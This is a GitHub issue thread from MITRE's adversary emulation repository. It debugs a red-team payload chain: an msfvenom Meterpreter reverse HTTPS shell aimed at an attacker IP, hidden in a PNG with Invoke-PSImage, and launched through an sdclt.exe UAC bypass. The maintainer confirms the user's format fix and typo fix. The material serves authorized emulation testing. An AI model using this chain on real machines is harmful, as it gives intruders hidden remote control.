search

mitre-attack / attack-arsenal

A collection of red team and adversary emulation resources developed and released by MITRE.
Apache License 2.0
485 stars 79 forks source link

Day 1: Privilege Escalation Payload #6

Closed leegengyu closed 4 years ago

leegengyu commented 4 years ago

Issue 1

It is stated that the first step to re-create the monkey.png is msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker IP> LPORT=443 --format psh-cmd -o meterpreter.ps1.

However, by using --format psh-cmd, I was thinking that the output from the command would actually be meant to be ran in a Command Prompt (rather than in a PowerShell). According to a Rapid7 link about generating PowerShell payloads, "the generated payload for psh-cmd format has a .cmd extension." Nonetheless, the psh-cmd format was stated under the section for PowerShell payloads (which had me puzzled).

Looking deeper into this, we see that the very first word in meterpreter.ps1 is %COMSPEC%: image

Subsequently, meterpreter.ps1 is embedded into a PNG file using Invoke-PSImage as mentioned.

From what I understand, in Step 3.B, the one-liner will execute the contents of meterpreter.ps1 in a PowerShell after extracting it from the pixels of monkey.png. The one-liner is only executed towards the end of Step 3.B, when %windir%\system32\sdclt.exe is executed.

In this context, this would mean that %COMSPEC% is executed in a PowerShell, which resulted in this error on the victim machine (I removed -noni and -window hidden in this case for debugging purposes): image

To confirm the above, I tried to run it verbatim as %COMSPEC%: image

The way to get the environment variable in PowerShell would be $env:ComSpec: image

In light of the above, I changed the format from psh-cmd to psh, and I managed to get a Meterpreter session opened.

Should the format be psh-cmd (i.e. I missed out something or ran something wrongly, etc.), or is there a typo (i.e. it should be psh)?

Issue 2

I think there is a typo for the Invoke-PSImage command.

The current command in payload_configs.md is Invoke-PSImage -Script .\meterpreter.ps1.ps1 -Out .\monkey.png -Image .\monkey.jpg.

There is an extra .ps1 in the parameter -Script.

jcwilliamsATmitre commented 4 years ago

@leegengyu Great catch, thanks! I just submitted a fix but you are correct in both cases.

the psh-cmd payload results in cmd /c powershell.exe... whereas the psh payload uses PowerShell to load kernel32.dll and allocate + execute a new thread.

Thanks again, and definitely let us know if you come across any more!